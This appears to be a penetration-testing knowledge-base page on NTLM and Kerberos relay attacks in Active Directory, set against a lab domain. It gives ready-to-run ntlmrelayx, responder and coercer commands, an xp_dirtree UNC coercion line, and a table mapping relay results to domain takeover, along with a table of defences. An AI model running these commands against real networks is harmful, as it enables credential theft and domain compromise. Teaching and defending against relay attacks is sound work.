Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Relay Attacks

Matrix

Relay pathSource authenticationTarget serviceRequired weaknessCommon commandResult
NTLM to SMBUser or machine NTLMSMB on workstation or serverSMB signing not required and relayed identity is local adminntlmrelayx.py -t smb://target.ootw.local -smb2support -iInteractive SMB shell or command execution
NTLM to LDAPUser or machine NTLMLDAP or LDAPS on DCLDAP signing or channel binding not blocking relay, plus useful write rightsntlmrelayx.py -t ldaps://dc01.ootw.local --delegate-access --escalate-user 'ATTACKER01$' -smb2supportRBCD, shadow credentials, add computer, ACL change
NTLM to ADCSUser or machine NTLMADCS web enrollmentWeb enrollment relayable and template enrollment allowedntlmrelayx.py -t http://ca.ootw.local/certsrv/certfnsh.asp --adcs --template DomainController -smb2supportPFX certificate for relayed principal
NTLM capture onlyUser or machine NTLMAttacker listenerVictim connects to attacker-controlled name or UNCresponder -I eth0NetNTLMv2 hash for cracking
Poisoning to relayLLMNR, NBT-NS, mDNS, WPADSMB, LDAP, ADCS, HTTPName resolution poisoning succeeds and target accepts relayntlmrelayx.py -tf targets.txt -smb2supportAutomatic relay when poisoned clients authenticate
Coercion to relayForced machine or service authSMB, LDAP, ADCSCoercion primitive works and target accepts relaycoercer -d ootw.local -u student -p 'student' --target 10.10.10.200 --listener 10.10.10.100Machine account relay
MSSQL UNC coercion to relaySQL service account NTLMSMB target or capture listenerSQL function can access UNC pathEXEC master..xp_dirtree '\\10.10.10.100\share',1,1SQL service account authentication
Kerberos relayKerberos AP-REQLDAP, HTTP, SMB, service-specificService validation or binding weaknesskrbrelayx.pyLDAP modification, ticket or service access depending on setup

Target decision

If we can relay toChoose this action
SMB and relayed identity is local adminInteractive shell, command execution, local secrets
LDAP as machine accountRBCD to target computer or add machine account
LDAP as user with write rightsShadow credentials, SPN write, password reset, group membership
ADCS as DC machine accountDomainController certificate, PKINIT, DCSync
ADCS as userUser certificate, PKINIT, account takeover
MSSQL as service adminSQL command execution or UNC coercion chain

Protection matrix

ProtectionBlocks
SMB signing requiredNTLM relay to SMB
LDAP signing requiredNTLM relay to LDAP over unsigned LDAP
LDAP channel binding requiredMany relays to LDAPS
EPA on ADCS web enrollmentNTLM relay to ADCS HTTP/HTTPS
Disable NTLMNTLM relay broadly
Disable LLMNR, NBT-NS, mDNS, WPADPoisoning-based capture and relay
Disable Print Spooler on serversPrinterBug coercion
Restrict MachineAccountQuotaRelay chains that depend on creating machine accounts
Protected Users and account delegation controlsSome follow-up delegation abuse